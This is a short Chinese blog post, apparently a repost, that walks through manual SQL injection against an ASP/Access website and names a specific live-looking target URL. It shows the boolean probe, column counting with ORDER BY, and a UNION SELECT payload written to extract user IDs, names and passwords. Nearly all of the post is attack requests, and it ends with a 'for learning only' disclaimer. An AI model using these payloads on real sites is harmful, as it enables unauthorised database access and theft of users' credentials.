手工注入asp+access网站(union语句)

注入点:http://www.romance-sky.com/authorlist.asp?id=227 
分析:and 1=1 正常and 1=2出错.存在注入漏洞 
字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227 order by 7正常.表示字段数为7 
http://www.romance-sky.com/authorlist.asp?id=227 and 1=2 union select 1,2,3,4,5,6,7 from 表名 
返回2,4(字符型),5(字符型)处可以利用. 
http://www.romance-sky.com/authorlist.asp?id=227%20and%201=2%20union%20select%201,id,3,密码,name,6,7%20from%20表名 
这样就可以得到相应的用户名和密码. 
上文中的表名和密码等字段名是假设的. 
本文仅供学习研究,请勿用于任何不法行为,否则后果自负.  

转载于:https://www.cnblogs.com/baogg/articles/1989388.html

你可能感兴趣的:(手工注入asp+access网站(union语句))